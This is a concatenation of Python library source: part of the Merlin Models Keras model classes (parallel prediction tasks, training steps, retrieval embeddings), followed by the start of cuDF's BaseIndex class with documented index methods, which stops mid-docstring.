self.prediction_tasks = prediction_tasks
self.task_weights = task_weights
self.bias_block = bias_block
self.bias_logit = tf.keras.layers.Dense(1)
self.prediction_task_dict = {}
if prediction_tasks:
for task in prediction_tasks:
self.prediction_task_dict[task.task_name] = task
super(ParallelPredictionBlock, self).__init__(self.prediction_task_dict, pre=pre, post=post)
self._task_weight_dict = defaultdict(lambda: 1.0)
if task_weights:
for task, val in zip(prediction_tasks, task_weights):
self._task_weight_dict[task.task_name] = val
self._set_task_blocks(task_blocks)
@classmethod
def get_tasks_from_schema(cls, schema, task_weight_dict=None):
task_weight_dict = task_weight_dict or {}
tasks: List[PredictionTask] = []
task_weights = []
from .prediction.classification import BinaryClassificationTask
from .prediction.regression import RegressionTask
for binary_target in schema.select_by_tag(Tags.BINARY_CLASSIFICATION).column_names:
tasks.append(BinaryClassificationTask(binary_target))
task_weights.append(task_weight_dict.get(binary_target, 1.0))
for regression_target in schema.select_by_tag(Tags.REGRESSION).column_names:
tasks.append(RegressionTask(regression_target))
task_weights.append(task_weight_dict.get(regression_target, 1.0))
# TODO: Add multi-class classification here. Figure out how to get number of classes
return task_weights, tasks
@classmethod
def from_schema( # type: ignore
cls,
schema: Schema,
task_blocks: Optional[Union[Layer, Dict[str, Layer]]] = None,
task_weight_dict: Optional[Dict[str, float]] = None,
bias_block: Optional[Layer] = None,
loss_reduction=tf.reduce_mean,
**kwargs,
) -> "ParallelPredictionBlock":
task_weight_dict = task_weight_dict or {}
task_weights, tasks = cls.get_tasks_from_schema(schema, task_weight_dict)
return cls(
*tasks,
task_blocks=task_blocks,
task_weights=task_weights,
bias_block=bias_block,
loss_reduction=loss_reduction,
**kwargs,
)
@classmethod
def task_names_from_schema(cls, schema: Schema) -> List[str]:
_, tasks = cls.get_tasks_from_schema(schema)
return [task.task_name for task in tasks]
def _set_task_blocks(self, task_blocks):
if not task_blocks:
return
if isinstance(task_blocks, dict):
tasks_multi_names = self._prediction_tasks_multi_names()
for key, task_block in task_blocks.items():
if key in tasks_multi_names:
tasks = tasks_multi_names[key]
if len(tasks) == 1:
self.prediction_task_dict[tasks[0].task_name].task_block = task_block
else:
raise ValueError(
f"Ambiguous name: {key}, can't resolve it to a task "
"because there are multiple tasks that contain the key: "
f"{', '.join([task.task_name for task in tasks])}"
)
else:
raise ValueError(
f"Couldn't find {key} in prediction_tasks, "
f"only found: {', '.join(list(self.prediction_task_dict.keys()))}"
)
elif isinstance(task_blocks, Layer):
for key, val in self.prediction_task_dict.items():
task_block = task_blocks.from_config(task_blocks.get_config())
val.task_block = task_block
else:
raise ValueError("`task_blocks` must be a Layer or a Dict[str, Layer]")
def _prediction_tasks_multi_names(self) -> Dict[str, List[PredictionTask]]:
prediction_tasks_multi_names = {
name: [val] for name, val in self.prediction_task_dict.items()
}
for name, value in self.prediction_task_dict.items():
name_parts = name.split("/")
for name_part in name_parts:
if name_part in prediction_tasks_multi_names:
prediction_tasks_multi_names[name_part].append(value)
else:
prediction_tasks_multi_names[name_part] = [value]
return prediction_tasks_multi_names
def add_task(self, task: PredictionTask, task_weight=1):
key = task.target_name
self.parallel_dict[key] = task
if task_weight:
self._task_weight_dict[key] = task_weight
return self
def pop_labels(self, inputs: Dict[Text, tf.Tensor]):
outputs = {}
for name in self.parallel_dict.keys():
outputs[name] = inputs.pop(name)
return outputs
def call(
self,
inputs: Union[TabularData, tf.Tensor],
training: bool = False,
bias_outputs=None,
**kwargs,
):
if isinstance(inputs, dict) and not all(
name in inputs for name in list(self.parallel_dict.keys())
):
if self.bias_block and not bias_outputs:
bias_outputs = self.bias_block(inputs)
inputs = self.body(inputs)
outputs = super(ParallelPredictionBlock, self).call(inputs, **kwargs)
if bias_outputs is not None:
for key in outputs:
outputs[key] += bias_outputs
return outputs
def compute_call_output_shape(self, input_shape):
if isinstance(input_shape, dict) and not all(
name in input_shape for name in list(self.parallel_dict.keys())
):
input_shape = self.body.compute_output_shape(input_shape)
return super().compute_call_output_shape(input_shape)
def compute_loss(
self, inputs: Union[tf.Tensor, TabularData], targets, training=False, **kwargs
) -> tf.Tensor:
losses = []
if isinstance(inputs, dict) and not all(
name in inputs for name in list(self.parallel_dict.keys())
):
filtered_kwargs = filter_kwargs(
dict(training=training), self, filter_positional_or_keyword=False
)
predictions = self(inputs, **filtered_kwargs)
else:
predictions = inputs
for name, task in self.prediction_task_dict.items():
loss = task.compute_loss(predictions, targets, training=training, **kwargs)
losses.append(loss * self._task_weight_dict[name])
return self.loss_reduction(losses)
def metric_results(self, mode=None):
def name_fn(x):
return "_".join([mode, x]) if mode else x
metrics = {
name_fn(name): task.metric_results() for name, task in self.prediction_task_dict.items()
}
return _output_metrics(metrics)
def metric_result_dict(self, mode=None):
results = {}
for name, task in self.prediction_task_dict.items():
results.update(task.metric_results(mode=mode))
return results
def reset_metrics(self):
for task in self.prediction_task_dict.values():
task.reset_metrics()
@property
def task_blocks(self) -> Dict[str, Optional[Layer]]:
return {name: task.task_block for name, task in self.prediction_task_dict.items()}
@property
def task_names(self) -> List[str]:
return [name for name in self.prediction_task_dict]
@property
def metrics(self) -> Dict[str, tf.keras.metrics.Metric]:
outputs = {}
for name, task in self.parallel_dict.items():
outputs.update({metric.name: metric for metric in task.metrics})
return outputs
def repr_ignore(self) -> List[str]:
return ["prediction_tasks", "parallel_layers"]
def _set_context(self, context: "BlockContext"):
for task in self.prediction_task_dict.values():
task._set_context(context)
super(ParallelPredictionBlock, self)._set_context(context)
@classmethod
def from_config(cls, config, **kwargs):
config = maybe_deserialize_keras_objects(config, ["body", "prediction_tasks"])
if "schema" in config:
config["schema"] = tensorflow_metadata_json_to_schema(config["schema"])
config["loss_reduction"] = getattr(tf, config["loss_reduction"])
prediction_tasks = config.pop("prediction_tasks", [])
return cls(*prediction_tasks, **config)
def get_config(self):
config = super().get_config()
config = maybe_serialize_keras_objects(
self, config, ["body", "loss_reduction", "prediction_tasks"]
)
if self.task_weights:
config["task_weights"] = self.task_weights
return config
@tf.keras.utils.register_keras_serializable(package="merlin_models")
class ModelBlock(Block, tf.keras.Model):
def __init__(self, block: Block, **kwargs):
super().__init__(**kwargs)
self.block = block
def call(self, inputs, **kwargs):
outputs = self.block(inputs, **kwargs)
return outputs
@property
def schema(self) -> Schema:
return self.block.schema
@classmethod
def from_config(cls, config, custom_objects=None):
block = tf.keras.utils.deserialize_keras_object(config.pop("block"))
return cls(block, **config)
def get_config(self):
return {"block": tf.keras.utils.serialize_keras_object(self.block)}
@tf.keras.utils.register_keras_serializable(package="merlin.models")
class Model(tf.keras.Model, LossMixin, MetricsMixin):
def __init__(
self,
*blocks: Union[Block, ModelLikeBlock],
context: Optional[BlockContext] = None,
**kwargs,
):
super(Model, self).__init__(**kwargs)
context = context or BlockContext()
if (
len(blocks) == 1
and isinstance(blocks[0], SequentialBlock)
and isinstance(blocks[0].layers[-1], ModelLikeBlock)
):
self.block = blocks[0]
else:
if not isinstance(blocks[-1], ModelLikeBlock):
raise ValueError("Last block must be able to calculate loss & metrics.")
self.block = SequentialBlock(blocks, context=context)
if not getattr(self.block, "_context", None):
self.block._set_context(context)
self.context = context
def call(self, inputs, **kwargs):
outputs = self.block(inputs, **kwargs)
return outputs
# @property
# def inputs(self):
# return self.block.inputs
@property
def first(self):
return self.block.layers[0]
@property
def last(self):
return self.block.layers[-1]
@property
def loss_block(self) -> ModelLikeBlock:
return self.block.last if isinstance(self.block, SequentialBlock) else self.block
@property
def schema(self) -> Schema:
return self.block.schema
def compute_loss(
self,
inputs: Union[tf.Tensor, TabularData],
targets: Union[tf.Tensor, TabularData],
compute_metrics=True,
training: bool = False,
**kwargs,
) -> tf.Tensor:
return self.loss_block.compute_loss(
inputs, targets, training=training, compute_metrics=compute_metrics, **kwargs
)
def calculate_metrics(
self,
inputs: Union[tf.Tensor, TabularData],
targets: Union[tf.Tensor, TabularData],
mode: str = "val",
forward=True,
**kwargs,
) -> Dict[str, Union[Dict[str, tf.Tensor], tf.Tensor]]:
return self.loss_block.calculate_metrics(
inputs, targets, mode=mode, forward=forward, **kwargs
)
def metric_results(self, mode=None):
return self.loss_block.metric_results(mode=mode)
def train_step(self, inputs):
"""Custom train step using the `compute_loss` method."""
with tf.GradientTape() as tape:
if isinstance(inputs, tuple):
inputs, targets = inputs
else:
targets = None
predictions = self(inputs, training=True)
loss = self.compute_loss(predictions, targets, training=True)
tf.assert_rank(
loss,
0,
"The loss tensor should have rank 0. "
"Check if you are using a tf.keras.losses.Loss with 'reduction' "
"properly set",
)
assert loss.dtype == tf.float32, (
f"The loss dtype should be tf.float32 but is rather {loss.dtype}. "
"Ensure that your model output has tf.float32 dtype, as "
"that should be the case when using mixed_float16 policy "
"to avoid numerical instabilities."
)
regularization_loss = tf.reduce_sum(self.losses)
total_loss = tf.add_n([loss, regularization_loss])
if getattr(self.optimizer, "get_scaled_loss", False):
scaled_loss = self.optimizer.get_scaled_loss(total_loss)
# If mixed precision (mixed_float16 policy) is enabled
# (and the optimizer is automatically wrapped by
# tensorflow.keras.mixed_precision.LossScaleOptimizer())
if getattr(self.optimizer, "get_scaled_loss", False):
scaled_gradients = tape.gradient(scaled_loss, self.trainable_variables)
gradients = self.optimizer.get_unscaled_gradients(scaled_gradients)
else:
gradients = tape.gradient(total_loss, self.trainable_variables)
self.optimizer.apply_gradients(zip(gradients, self.trainable_variables))
metrics = self.loss_block.metric_result_dict()
metrics["loss"] = loss
metrics["regularization_loss"] = regularization_loss
metrics["total_loss"] = total_loss
return metrics
def test_step(self, inputs):
"""Custom test step using the `compute_loss` method."""
if isinstance(inputs, tuple):
inputs, targets = inputs
else:
targets = None
predictions = self(inputs, training=False)
loss = self.compute_loss(predictions, targets, training=False)
tf.assert_rank(
loss,
0,
"The loss tensor should have rank 0. "
"Check if you are using a tf.keras.losses.Loss with 'reduction' "
"properly set",
)
# Casting regularization loss to fp16 if needed to match the main loss
regularization_loss = tf.cast(tf.reduce_sum(self.losses), loss.dtype)
total_loss = loss + regularization_loss
metrics = self.loss_block.metric_result_dict()
metrics["loss"] = loss
metrics["regularization_loss"] = regularization_loss
metrics["total_loss"] = total_loss
return metrics
def fit(
self,
x=None,
y=None,
batch_size=None,
epochs=1,
verbose="auto",
callbacks=None,
validation_split=0.0,
validation_data=None,
shuffle=True,
class_weight=None,
sample_weight=None,
initial_epoch=0,
steps_per_epoch=None,
validation_steps=None,
validation_batch_size=None,
validation_freq=1,
max_queue_size=10,
workers=1,
use_multiprocessing=False,
**kwargs,
):
# Check if merlin-dataset is passed
if hasattr(x, "to_ddf"):
if not batch_size:
raise ValueError("batch_size must be specified when using merlin-dataset.")
from .dataset import Dataset
x = Dataset(x, batch_size=batch_size, **kwargs)
return super().fit(
x,
y,
batch_size,
epochs,
verbose,
callbacks,
validation_split,
validation_data,
shuffle,
class_weight,
sample_weight,
initial_epoch,
steps_per_epoch,
validation_steps,
validation_batch_size,
validation_freq,
max_queue_size,
workers,
use_multiprocessing,
)
def batch_predict(
self, dataset: merlin.io.Dataset, batch_size: int, **kwargs
) -> merlin.io.Dataset:
"""Batched prediction using the Dask.
Parameters
----------
dataset: merlin.io.Dataset
Dataset to predict on.
batch_size: int
Batch size to use for prediction.
Returns merlin.io.Dataset
-------
"""
if hasattr(dataset, "schema"):
if not set(self.schema.column_names).issubset(set(dataset.schema.column_names)):
raise ValueError(
f"Model schema {self.schema.column_names} does not match dataset schema"
+ f" {dataset.schema.column_names}"
)
# Check if merlin-dataset is passed
if hasattr(dataset, "to_ddf"):
dataset = dataset.to_ddf()
from .prediction.batch import TFModelEncode
model_encode = TFModelEncode(self, batch_size=batch_size, **kwargs)
predictions = dataset.map_partitions(model_encode)
return merlin.io.Dataset(predictions)
@classmethod
def from_config(cls, config, custom_objects=None):
block = tf.keras.utils.deserialize_keras_object(config.pop("block"))
return cls(block, **config)
def get_config(self):
return {"block": tf.keras.utils.serialize_keras_object(self.block)}
@runtime_checkable
class RetrievalBlock(Protocol):
def query_block(self) -> Block:
...
def item_block(self) -> Block:
...
class RetrievalModel(Model):
"""Embedding-based retrieval model."""
def __init__(
self,
*blocks: Union[Block, ModelLikeBlock],
context: Optional[BlockContext] = None,
**kwargs,
):
super().__init__(*blocks, context=context, **kwargs)
if not any(isinstance(b, RetrievalBlock) for b in self.block):
raise ValueError("Model must contain a `RetrievalBlock`.")
@property
def retrieval_block(self) -> RetrievalBlock:
return next(b for b in self.blocks if isinstance(b, RetrievalBlock))
def query_embeddings(
self,
dataset: merlin.io.Dataset,
dim: int,
batch_size=None,
) -> merlin.io.Dataset:
"""Export query embeddings from the model.
Parameters
----------
dataset: merlin.io.Dataset
Dataset to export embeddings from.
dim: int
Dimensionality of the embeddings.
batch_size: int
Batch size to use for embedding extraction.
Returns
-------
merlin.io.Dataset
"""
from merlin.models.tf.prediction.batch import QueryEmbeddings
get_user_emb = QueryEmbeddings(self, dim=dim, batch_size=batch_size)
# Check if merlin-dataset is passed
if hasattr(dataset, "to_ddf"):
dataset = dataset.to_ddf()
embeddings = dataset.map_partitions(get_user_emb)
return merlin.io.Dataset(embeddings)
def item_embeddings(
self, dataset: merlin.io.Dataset, dim: int, batch_size=None, **kwargs
) -> merlin.io.Dataset:
"""Export item embeddings from the model.
Parameters
----------
dataset: merlin.io.Dataset
Dataset to export embeddings from.
dim: int
Dimensionality of the embeddings.
batch_size: int
Batch size to use for embedding extraction.
Returns
-------
merlin.io.Dataset
"""
from merlin.models.tf.prediction.batch import ItemEmbeddings
get_item_emb = ItemEmbeddings(self, dim=dim, batch_size=batch_size)
# Check if merlin-dataset is passed
if hasattr(dataset, "to_ddf"):
dataset = dataset.to_ddf()
embeddings = dataset.map_partitions(get_item_emb)
return merlin.io.Dataset(embeddings)
def is_input_block(block: Block) -> bool:
return block and getattr(block, "is_input", None)
def has_input_block(block: Block) -> bool:
if isinstance(block, SequentialBlock):
return block.inputs is not None and is_input_block(block.inputs)
return is_input_block(block.inputs)
def _output_metrics(metrics):
if len(metrics) == 1:
return metrics[list(metrics.keys())[0]]
return metrics
def right_shift_layer(self, other):
if isinstance(other, (list, Tags)):
left_side = [Filter(other)]
else:
left_side = other.layers if isinstance(other, SequentialBlock) else [other]
right_side = self.layers if isinstance(self, SequentialBlock) else [self]
return SequentialBlock(left_side + right_side)
|
# Copyright (c) 2021-2022, NVIDIA CORPORATION.
from __future__ import annotations
import pickle
import warnings
from functools import cached_property
from typing import Any, Set
import pandas as pd
import cudf
from cudf._lib.copying import _gather_map_is_valid, gather
from cudf._lib.stream_compaction import (
apply_boolean_mask,
drop_duplicates,
drop_nulls,
)
from cudf._typing import DtypeObj
from cudf.api.types import (
is_bool_dtype,
is_integer,
is_integer_dtype,
is_list_like,
is_scalar,
)
from cudf.core.abc import Serializable
from cudf.core.column import ColumnBase, column
from cudf.core.column_accessor import ColumnAccessor
from cudf.utils import ioutils
from cudf.utils.dtypes import (
is_mixed_with_object_dtype,
numeric_normalize_types,
)
_index_astype_docstring = """\
Create an Index with values cast to dtypes.
The class of a new Index is determined by dtype. When conversion is
impossible, a ValueError exception is raised.
Parameters
----------
dtype : :class:`numpy.dtype`
Use a :class:`numpy.dtype` to cast entire Index object to.
copy : bool, default False
By default, astype always returns a newly allocated object.
If copy is set to False and internal requirements on dtype are
satisfied, the original data is used to create a new Index
or the original Index is returned.
Returns
-------
Index
Index with values cast to specified dtype.
Examples
--------
>>> import cudf
>>> index = cudf.Index([1, 2, 3])
>>> index
Int64Index([1, 2, 3], dtype='int64')
>>> index.astype('float64')
Float64Index([1.0, 2.0, 3.0], dtype='float64')
"""
class BaseIndex(Serializable):
"""Base class for all cudf Index types."""
dtype: DtypeObj
_accessors: Set[Any] = set()
_data: ColumnAccessor
@cached_property
def _values(self) -> ColumnBase:
raise NotImplementedError
def copy(self, deep: bool = True) -> BaseIndex:
raise NotImplementedError
def __len__(self):
raise NotImplementedError
@property
def size(self):
# The size of an index is always its length irrespective of dimension.
return len(self)
@property
def values(self):
return self._values.values
def get_loc(self, key, method=None, tolerance=None):
raise NotImplementedError
def __getitem__(self, key):
raise NotImplementedError()
def __contains__(self, item):
return item in self._values
def get_level_values(self, level):
"""
Return an Index of values for requested level.
This is primarily useful to get an individual level of values from a
MultiIndex, but is provided on Index as well for compatibility.
Parameters
----------
level : int or str
It is either the integer position or the name of the level.
Returns
-------
Index
Calling object, as there is only one level in the Index.
See Also
--------
cudf.MultiIndex.get_level_values : Get values for
a level of a MultiIndex.
Notes
-----
For Index, level should be 0, since there are no multiple levels.
Examples
--------
>>> import cudf
>>> idx = cudf.Index(["a", "b", "c"])
>>> idx.get_level_values(0)
StringIndex(['a' 'b' 'c'], dtype='object')
"""
if level == self.name:
return self
elif is_integer(level):
if level != 0:
raise IndexError(
f"Cannot get level: {level} " f"for index with 1 level"
)
return self
else:
raise KeyError(f"Requested level with name {level} " "not found")
@classmethod
def deserialize(cls, header, frames):
# Dispatch deserialization to the appropriate index type in case
# deserialization is ever attempted with the base class directly.
idx_type = pickle.loads(header["type-serialized"])
return idx_type.deserialize(header, frames)
@property
def names(self):
"""
Returns a tuple containing the name of the Index.
"""
return (self.name,)
@names.setter
def names(self, values):
if not is_list_like(values):
raise ValueError("Names must be a list-like")
num_values = len(values)
if num_values > 1:
raise ValueError(
"Length of new names must be 1, got %d" % num_values
)
self.name = values[0]
def _clean_nulls_from_index(self):
"""
Convert all na values(if any) in Index object
to `<NA>` as a preprocessing step to `__repr__` methods.
This will involve changing type of Index object
to StringIndex but it is the responsibility of the `__repr__`
methods using this method to replace or handle representation
of the actual types correctly.
"""
if self._values.has_nulls():
return cudf.Index(
self._values.astype("str").fillna(cudf._NA_REP), name=self.name
)
else:
return self
@property
def is_monotonic(self):
"""Return boolean if values in the object are monotonic_increasing.
This property is an alias for :attr:`is_monotonic_increasing`.
Returns
-------
bool
"""
return self.is_monotonic_increasing
@property
def is_monotonic_increasing(self):
"""Return boolean if values in the object are monotonically increasing.
Returns
-------
bool
"""
raise NotImplementedError
@property
def is_monotonic_decreasing(self):
"""Return boolean if values in the object are monotonically decreasing.
Returns
-------
bool
"""
raise NotImplementedError
@property
def nlevels(self):
"""
Number of levels.
"""
return 1
def _set_names(self, names, inplace=False):
if inplace:
idx = self
else:
idx = self.copy(deep=False)
idx.names = names
if not inplace:
return idx
def set_names(self, names, level=None, inplace=False):
"""
Set Index or MultiIndex name.
Able to set new names partially and by level.
Parameters
----------
names : label or list of label
Name(s) to set.
level : int, label or list of int or label, optional
If the index is a MultiIndex, level(s) to set (None for all
levels). Otherwise level must be None.
inplace : bool, default False
Modifies the object directly, instead of creating a new Index or
MultiIndex.
Returns
-------
Index
The same type as the caller or None if inplace is True.
See Also
--------
cudf.Index.rename : Able to set new names without level.
Examples
--------
>>> import cudf
>>> idx = cudf.Index([1, 2, 3, 4])
>>> idx
Int64Index([1, 2, 3, 4], dtype='int64')
>>> idx.set_names('quarter')
Int64Index([1, 2, 3, 4], dtype='int64', name='quarter')
>>> idx = cudf.MultiIndex.from_product([['python', 'cobra'],
... [2018, 2019]])
>>> idx
MultiIndex([('python', 2018),
('python', 2019),
( 'cobra', 2018),
( 'cobra', 2019)],
)
>>> idx.names
FrozenList([None, None])
>>> idx.set_names(['kind', 'year'], inplace=True)
>>> idx.names
FrozenList(['kind', 'year'])
>>> idx.set_names('species', level=0, inplace=True)
>>> idx.names
FrozenList(['species', 'year'])
"""
if level is not None:
raise ValueError("Level must be None for non-MultiIndex")
if not is_list_like(names):
names = [names]
return self._set_names(names=names, inplace=inplace)
@property
def has_duplicates(self):
return not self.is_unique
def union(self, other, sort=None):
"""
Form the union of two Index objects.
Parameters
----------
other : Index or array-like
sort : bool or None, default None
Whether to sort the resulting Index.
* None : Sort the result, except when
1. `self` and `other` are equal.
2. `self` or `other` has length 0.
* False : do not sort the result.
Returns
-------
union : Index
Examples
--------
Union of an Index
>>> import cudf
>>> import pandas as pd
>>> idx1 = cudf.Index([1, 2, 3, 4])
>>> idx2 = cudf.Index([3, 4, 5, 6])
>>> idx1.union(idx2)
Int64Index([1, 2, 3, 4, 5, 6], dtype='int64')
MultiIndex case
>>> idx1 = cudf.MultiIndex.from_pandas(
... pd.MultiIndex.from_arrays(
... [[1, 1, 2, 2], ["Red", "Blue", "Red", "Blue"]]
... )
... )
>>> idx1
MultiIndex([(1, 'Red'),
(1, 'Blue'),
(2, 'Red'),
(2, 'Blue')],
)
>>> idx2 = cudf.MultiIndex.from_pandas(
... pd.MultiIndex.from_arrays(
... [[3, 3, 2, 2], ["Red", "Green", "Red", "Green"]]
... )
... )
>>> idx2
MultiIndex([(3, 'Red'),
(3, 'Green'),
(2, 'Red'),
(2, 'Green')],
)
>>> idx1.union(idx2)
MultiIndex([(1, 'Blue'),
(1, 'Red'),
(2, 'Blue'),
(2, 'Green'),
(2, 'Red'),
(3, 'Green'),
(3, 'Red')],
)
>>> idx1.union(idx2, sort=False)
MultiIndex([(1, 'Red'),
(1, 'Blue'),
(2, 'Red'),
(2, 'Blue'),
(3, 'Red'),
(3, 'Green'),
(2, 'Green')],
)
"""
if not isinstance(other, BaseIndex):
other = cudf.Index(other, name=self.name)
if sort not in {None, False}:
raise ValueError(
f"The 'sort' keyword only takes the values of "
f"None or False; {sort} was passed."
)
if not len(other) or self.equals(other):
return self._get_reconciled_name_object(other)
elif not len(self):
return other._get_reconciled_name_object(self)
result = self._union(other, sort=sort)
result.name = _get_result_name(self.name, other.name)
return result
def intersection(self, other, sort=False):
"""
Form the intersection of two Index objects.
This returns a new Index with elements common to the index and `other`.
Parameters
----------
other : Index or array-like
sort : False or None, default False
Whether to sort the resulting index.
* False : do not sort the result.
* None : sort the result, except when `self` and `other` are equal
or when the values cannot be compared.
Returns
-------
intersection : Index
Examples
--------
>>> import cudf
>>> import pandas as pd
>>> idx1 = cudf.Index([1, 2, 3, 4])
>>> idx2 = cudf.Index([3, 4, 5, 6])
>>> idx1.intersection(idx2)
Int64Index([3, 4], dtype='int64')
MultiIndex case
>>> idx1 = cudf.MultiIndex.from_pandas(
... pd.MultiIndex.from_arrays(
... [[1, 1, 3, 4], ["Red", "Blue", "Red", "Blue"]]
... )
... )
>>> idx2 = cudf.MultiIndex.from_pandas(
... pd.MultiIndex.from_arrays(
... [[1, 1, 2, 2], ["Red", "Blue", "Red", "Blue"]]
... )
... )
>>> idx1
MultiIndex([(1, 'Red'),
(1, 'Blue'),
(3, 'Red'),
(4, 'Blue')],
)
>>> idx2
MultiIndex([(1, 'Red'),
(1, 'Blue'),
(2, 'Red'),
(2, 'Blue')],
)
>>> idx1.intersection(idx2)
MultiIndex([(1, 'Red'),
(1, 'Blue')],
)
>>> idx1.intersection(idx2, sort=False)
MultiIndex([(1, 'Red'),
(1, 'Blue')],
)
"""
if not isinstance(other, BaseIndex):
other = cudf.Index(other, name=self.name)
if sort not in {None, False}:
raise ValueError(
f"The 'sort' keyword only takes the values of "
f"None or False; {sort} was passed."
)
if self.equals(other):
if self.has_duplicates:
return self.unique()._get_reconciled_name_object(other)
return self._get_reconciled_name_object(other)
res_name = _get_result_name(self.name, other.name)
if (self.is_boolean() and other.is_numeric()) or (
self.is_numeric() and other.is_boolean()
):
if isinstance(self, cudf.MultiIndex):
return self[:0].rename(res_name)
else:
return cudf.Index([], name=res_name)
if self.has_duplicates:
lhs = self.unique()
else:
lhs = self
if other.has_duplicates:
rhs = other.unique()
else:
rhs = other
result = lhs._intersection(rhs, sort=sort)
result.name = res_name
return result
def _get_reconciled_name_object(self, other):
"""
If the result of a set operation will be self,
return self, unless the name changes, in which
case make a shallow copy of self.
"""
name = _get_result_name(self.name, other.name)
if self.name != name:
return self.rename(name)
return self
def fillna(self, value, downcast=None):
"""
Fill null values with the specified value.
Parameters
----------
value : scalar
Scalar value to use to fill nulls. This value cannot be a
list-likes.
downcast : dict, default is None
This Parameter is currently NON-FUNCTIONAL.
Returns
-------
filled : Index
Examples
--------
>>> import cudf
>>> index = cudf.Index([1, 2, None, 4])
>>> index
Int64Index([1, 2, <NA>, 4], dtype='int64')
>>> index.fillna(3)
Int64Index([1, 2, 3, 4], dtype='int64')
"""
if downcast is not None:
raise NotImplementedError(
"`downcast` parameter is not yet supported"
)
return super().fillna(value=value)
def to_frame(self, index=True, name=None):
"""Create a DataFrame with a column containing this Index
Parameters
----------
index : boolean, default True
Set the index of the returned DataFrame as the original Index
name : str, default None
Name to be used for the column
Returns
-------
DataFrame
cudf DataFrame
"""
if name is not None:
col_name = name
elif self.name is None:
col_name = 0
else:
col_name = self.name
return cudf.DataFrame(
{col_name: self._values}, index=self if index else None
)
def any(self):
"""
Return whether any elements is True in Index.
"""
return self._values.any()
def to_pandas(self):
"""
Convert to a Pandas Index.
Examples
--------
>>> import cudf
>>> idx = cudf.Index([-3, 10, 15, 20])
>>> idx
Int64Index([-3, 10, 15, 20], dtype='int64')
>>> idx.to_pandas()
Int64Index([-3, 10, 15, 20], dtype='int64')
>>> type(idx.to_pandas())
<class 'pandas.core.indexes.numeric.Int64Index'>
>>> type(idx)
<class 'cudf.core.index.Int64Index'>
"""
return pd.Index(self._values.to_pandas(), name=self.name)
@ioutils.doc_to_dlpack()
def to_dlpack(self):
"""{docstring}"""
return cudf.io.dlpack.to_dlpack(self)
def append(self, other):
"""
Append a collection of Index options together.
Parameters
----------
other : Index or list/tuple of indices
Returns
-------
appended : Index
Examples
--------
>>> import cudf
>>> idx = cudf.Index([1, 2, 10, 100])
>>> idx
Int64Index([1, 2, 10, 100], dtype='int64')
>>> other = cudf.Index([200, 400, 50])
>>> other
Int64Index([200, 400, 50], dtype='int64')
>>> idx.append(other)
Int64Index([1, 2, 10, 100, 200, 400, 50], dtype='int64')
append accepts list of Index objects
>>> idx.append([other, other])
Int64Index([1, 2, 10, 100, 200, 400, 50, 200, 400, 50], dtype='int64')
"""
if is_list_like(other):
to_concat = [self]
to_concat.extend(other)
else:
this = self
if len(other) == 0:
# short-circuit and return a copy
to_concat = [self]
other = cudf.Index(other)
if len(self) == 0:
to_concat = [other]
if len(self) and len(other):
if is_mixed_with_object_dtype(this, other):
got_dtype = (
other.dtype
if this.dtype == cudf.dtype("object")
else this.dtype
)
raise TypeError(
f"cudf does not support appending an Index of "
f"dtype `{cudf.dtype("object")}` with an Index "
f"of dtype `{got_dtype}`, please type-cast "
f"either one of them to same dtypes."
)
if isinstance(self._values, cudf.core.column.NumericalColumn):
if self.dtype != other.dtype:
this, other = numeric_normalize_types(self, other)
to_concat = [this, other]
for obj in to_concat:
if not isinstance(obj, BaseIndex):
raise TypeError("all inputs must be Index")
return self._concat(to_concat)
def difference(self, other, sort=None):
"""
Return a new Index with elements from the index that are not in
`other`.
This is the set difference of two Index objects.
Parameters
----------
other : Index or array-like
sort : False or None, default None
Whether to sort the resulting index. By default, the
values are attempted to be sorted, but any TypeError from
incomparable elements is caught by cudf.
* None : Attempt to sort the result, but catch any TypeErrors
from comparing incomparable elements.
* False : Do not sort the result.
Returns
-------
difference : Index
Examples
--------
>>> import cudf
>>> idx1 = cudf.Index([2, 1, 3, 4])
>>> idx1
Int64Index([2, 1, 3, 4], dtype='int64')
>>> idx2 = cudf.Index([3, 4, 5, 6])
>>> idx2
Int64Index([3, 4, 5, 6], dtype='int64')
>>> idx1.difference(idx2)
Int64Index([1, 2], dtype='int64')
>>> idx1.difference(idx2, sort=False)
Int64Index([2, 1], dtype='int64')
"""
if sort not in {None, False}:
raise ValueError(
f"The 'sort' keyword only takes the values "
f"of None or False; {sort} was passed."
)
other = cudf.Index(other)
if is_mixed_with_object_dtype(self, other):
difference = self.copy()
else:
other = other.copy(deep=False)
other.names = self.names
difference = cudf.core.index._index_from_data(
cudf.DataFrame._from_data(self._data)
._merge(
cudf.DataFrame._from_data(other._data),
how="leftanti",
on=self.name,
)
._data
)
if self.dtype != other.dtype:
difference = difference.astype(self.dtype)
if sort is None and len(other):
return difference.sort_values()
return difference
def is_numeric(self):
"""
Check if the Index only consists of numeric data.
Returns
-------
bool
Whether or not the Index only consists of numeric data.
See Also
--------
is_boolean : Check if the Index only consists of booleans.
is_integer : Check if the Index only consists of integers.
is_floating : Check if the Index is a floating type.
is_object : Check if the Index is of the object dtype.
is_categorical : Check if the Index holds categorical data.
is_interval : Check if the Index holds Interval objects.
Examples
--------
>>> import cudf
>>> idx = cudf.Index([1.0, 2.0, 3.0, 4.0])
>>> idx.is_numeric()
True
>>> idx = cudf.Index([1, 2, 3, 4.0])
>>> idx.is_numeric()
True
>>> idx = cudf.Index([1, 2, 3, 4])
>>> idx.is_numeric()
True
>>> idx = cudf.Index([1, 2, 3, 4.0, np.nan])
>>> idx.is_numeric()
True
>>> idx = cudf.Index(["Apple", "cold"])
>>> idx.is_numeric()
False
"""
raise NotImplementedError
def is_boolean(self):
"""
Check if the Index only consists of booleans.
Returns
-------
bool
Whether or not the Index only consists of booleans.
See Also
--------
is_integer : Check if the Index only consists of integers.
is_floating : Check if the Index is a floating type.
is_numeric : Check if the Index only consists of numeric data.
is_object : Check if the Index is of the object dtype.
is_categorical : Check if the Index holds categorical data.
is_interval : Check if the Index holds Interval objects.
Examples
--------
>>> import cudf
>>> idx = cudf.Index([True, False, True])
>>> idx.is_boolean()
True
>>> idx = cudf.Index(["True", "False", "True"])
>>> idx.is_boolean()
False
>>> idx = cudf.Index([1, 2, 3])
>>> idx.is_boolean()
False
"""
raise NotImplementedError
def is_integer(self):
"""
Check if the Index only consists of integers.
Returns
-------
bool
Whether or not the Index only consists of integers.
See Also
--------
is_boolean : Check if the Index only consists of booleans.
is_floating : Check if the Index is a floating type.
is_numeric : Check if the Index only consists of numeric data.
is_object : Check if the Index is of the object dtype.
is_categorical : Check if the Index holds categorical data.
is_interval : Check if the Index holds Interval objects.
Examples
--------
>>> import cudf
